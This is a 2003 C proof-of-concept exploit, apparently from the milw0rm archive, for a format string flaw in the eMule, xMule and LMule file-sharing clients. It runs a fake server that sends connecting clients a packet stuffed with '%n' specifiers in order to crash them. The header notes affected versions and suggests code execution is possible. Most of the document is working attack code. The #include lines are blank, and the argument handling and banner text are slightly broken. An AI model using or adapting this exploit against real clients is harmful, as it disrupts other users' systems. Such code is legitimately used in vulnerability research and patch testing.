/*
* eMule/xMule/LMule OP_SERVERMESSAGE Format String Vulnerability
* (SecurityFocus BID 8443)
* proof of concept code
* version 1.0 (Aug 29 2003)
*
* by Rémi Denis-Courmont
*
* This vulnerability was found by:
* Stefan Esser
* whose original advisory may be fetched from:
* http://security.e-matters.de/advisories/022003.html
*
* Vulnerable:
* - eMule v0.29c -> wait for server connection timeout (!?! I need help !?!)
* - xMule stable v1.4.3 -> crash
* - xMule unstable v1.5.6a -> crash
* - Lmule v1.3.1 (NOT tested) -> ???
*
* There is something wrong with eMule 0.29c (exception handling) and it
* refuses to crash.
*
* Not vulnerable:
* - xMule stable v1.6.0,
* - eMule v0.30a.
*
* As a format string vulnerability over a possibly large format input
* buffer, experienced assembly coders (ie. NOT me) should be able to exploit
* this vulnerability (you can find as much as 2 mega-bytes available in the
* stack in the socket input buffer, and the message is also duplicated on
* the heap and can be as long as 65535 bytes). However, getting clients to
* connect to while not impossible, will be very very hard: Even though many
* clients adds current server of other clients to their own server lists, so
* that you can promote yourself as a server by actively connecting to others,
* it is unlikely that your "server" will be selected from the list which
* often exceeds 100 entries.
* Anyway, the following proof-of-concept is entirely passive, so you will
* probably only be able to test it against yourself (which is very fine,
* because you usually are you only legal victim).
*/
/*****************************************************************************
* Copyright (C) 2003 Rémi Denis-Courmont. All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the following conditions *
* are met: *
* 1. Redistributions of source code must retain the above copyright *
* notice, this list of conditions and the following disclaimer. *
* 2. Redistributions in binary form must reproduce the above copyright *
* notice, this list of conditions and the following disclaimer in the *
* documentation and/or other materials provided with the distribution. *
* *
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR *
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. *
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, *
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT *
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF *
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *
*****************************************************************************/
#include
#include
#include
#include
#include
#include
int gai_errno = 0;
void
gai_perror (const char *str)
{
if ((gai_errno == EAI_SYSTEM) || (gai_errno == 0))
perror (str);
else
fprintf (stderr, "%s: %s\n", str, gai_strerror (gai_errno));
}
int
socket_listen (const char *hostname, const char *servname)
{
struct addrinfo hints, *res;
hints.ai_family = PF_INET;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = 0;
hints.ai_flags = AI_PASSIVE;
if ((gai_errno = getaddrinfo (hostname, servname, &hints, &res)) == 0)
{
struct addrinfo *ptr;
for (ptr = res; ptr != NULL; ptr = ptr->ai_next)
{
int sock;
sock = socket (ptr->ai_family, ptr->ai_socktype,
ptr->ai_protocol);
if (sock != -1)
{
const int val = 1;
setsockopt (sock, SOL_SOCKET, SO_REUSEADDR,
&val, sizeof (val));
if (bind (sock, ptr->ai_addr, ptr->ai_addrlen)
|| listen (sock, INT_MAX))
close (sock);
else
{
/* success! */
freeaddrinfo (res);
return sock;
}
}
}
freeaddrinfo (res);
}
return -1;
}
int
send_server_message (int fd/*, const char *message*/)
{
/*
* Note that eDonkey is an Intel-centric protocol that sends/receives
* everything in counter-network-byte order (ie. low order first).
*/
uint8_t buf[] =
"\xE3" // protocol
"\x70\x01\x00\x00" // packet size
"\x38" // command (Server message)
"\x6D\x01" // message length (xMule ingores it, eMule reads it)
"%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n\n"
"Welcome to messmule, a proof-of-concept for:\n"
"eMule/xMule/Lmule OP_SERVERMESSAGE\n"
"Format String Vulnerability\n"
"%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n\n"
"If you can read this message from your Server info box,\n"
"your client is probably not affected by that vulnerability.\n"
"%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n\n"
;
return (send (fd, buf, sizeof (buf) - 1, 0) != (sizeof (buf) - 1));
}
static int
usage (const char *path)
{
printf (
"Syntax: %s [port [hostname|IP]]\n"
" Attempt to crash eMule/xMule/LMule clients which will connect to\n"
" the specified server port (or 4661 by default), at the local\n"
" host address (or any available address by default)\n", path);
return 2;
}
int
main (int argc, char *argv[])
{
puts ("eMule/xMule/LMule OP_SERVERMESSAGE "
"Format String Vulnerabilitytion Vulnerability\n"
"proof of concept code\n"
"Copyright (C) 2003 Rémi Denis-Courmont "
"\n");
if (argc > 3)
return usage (argv[0]);
else
{
int listenfd;
const char *host, *port;
port = (argc < 2) ? "4661" : argv[2];
host = (argc < 3) ? NULL : argv[3];
printf ("Binding to [%s]:%s ...\n",
(host != NULL) ? host : "any", port);
listenfd = socket_listen (host, port);
if (listenfd == -1)
{
gai_perror (host);
return 1;
}
while (1)
{
int clientfd;
fputs ("Waiting for a client to connect ... ", stdout);
clientfd = accept (listenfd, NULL, 0);
if (clientfd == -1)
{
puts ("");
perror ("Error");
continue;
}
puts ("OK");
fputs ("Sending server message ... ", stdout);
if (send_server_message (clientfd))
{
puts ("");
perror ("Error");
}
else
puts ("Done");
close (clientfd);
}
}
return 0; /* dead code */
}
// milw0rm.com [2003-09-01]
